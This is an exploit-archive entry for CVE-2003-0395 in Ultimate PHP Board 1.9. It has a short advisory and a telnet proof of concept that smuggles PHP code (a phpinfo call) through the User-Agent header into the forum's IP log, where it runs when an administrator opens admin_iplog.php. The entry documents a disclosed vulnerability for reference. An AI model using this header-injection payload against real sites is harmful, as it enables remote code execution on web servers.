Ultimate PHP Board 1.9 - 'admin_iplog.php' Arbitrary PHP Execution

Author: euronymous
type: webapps
platform: php
port: 
date_added: 2003-05-24  
date_updated: 2012-11-12  
verified: 1  
codes: CVE-2003-0395;OSVDB-12052  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22642.txt  
source: https://www.securityfocus.com/bid/7678/info

A vulnerability has been reported in Ultimate PHP Board. The problem is said to occur due to insufficient sanitization of user-supplied input before including log data into a PHP file. As a result, it may be possible for a remote attacker to execute arbitrary PHP commands within the context of the web server. The execution of these commands would only occur when an administrator chooses to view the log of forum activity via the 'admin_iplog.php' script.

$ telnet www.target.org 80
Connected to www.target.org at 80
GET /board/index.php HTTP/1.0
User-Agent: <? phpinfo(); ?>